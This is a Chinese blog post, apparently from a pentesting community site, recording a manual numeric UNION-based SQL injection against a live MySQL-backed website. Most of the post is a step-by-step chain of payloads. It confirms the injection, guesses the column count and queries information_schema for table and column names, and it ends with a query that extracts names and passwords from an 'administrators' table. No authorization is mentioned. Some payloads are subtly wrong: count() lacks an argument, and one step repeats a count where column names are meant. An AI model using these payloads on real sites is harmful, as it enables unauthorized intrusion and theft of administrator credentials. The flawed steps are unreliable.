记手工SQL数字回显型注入
发布日期:2024-05-19 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370
前言 已经检测出该网站有sql注入问题,试着手工注入网站,顺便再复习一下。 01 正文 1.先通过引号 判断该网站为数字型,payload直接拼接,无需引号闭合,当网站后直接构造拼接 and 0# 网站文章列表内容受到影响显示空白,此为回显类型注入 payload:and 0# 2.进行字段数的猜解,确定回显位 字段数猜解通过payload:ORDER BY X # 对X字段进行回显字段值猜解,此网站X=6时,网站显示正常则确定回显字段数为6 构造payload:UNION SELECT 1,2,3,4,5,6# 确定回显位为2,6选择其一即可 确定回显位:payload:UNION SELECT 1,2,3,4,5,6# 3.进网站进行信息收集payload:UNION SELECT 1,database(),3,4,5,6# 对第二位字段进行函数替换可收集网站数据库相关信息如:version() 数据库版本信息 @@basedirmysql安装路径等 4.获取表数量,通过上一步得到mysql数据库版本大于5.1,可以通过MySQL的information_schema数据库进行数据获取 payload:UNION SELECT 1,count(),3,4,5,6 FROM information_schema.tables WHERE table_schema=database() # 5.获取表名 payload:UNION SELECT 1,GROUP_CONCAT(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema=database() # 6.获取数据库表字段数 payload:UNION SELECT 1,count(),3,4,5,6 FROM information_schema.columns WHERE table_schema=database() and table_name='administrators' # 7.获取数据库表字段名 payload:UNION SELECT 1,count(*),3,4,5,6 FROM information_schema.columns WHERE table_schema=database() and table_name='administrators' # 8.获取表数据 payload:UNION SELECT 1,group_concat(concat(id,name,password)),3,4,5,6 FROM administrators LIMIT 0,1 # 说明 以mysql数据库,数字回显类型进行sql手工注入流程,仅供参考 【火线短视频精选】 【周度激励】2021.8.2 ~ 2021.8.8公告
- 上一篇:多姿势的PTH攻击
- 下一篇:记一次卑微的渗透测试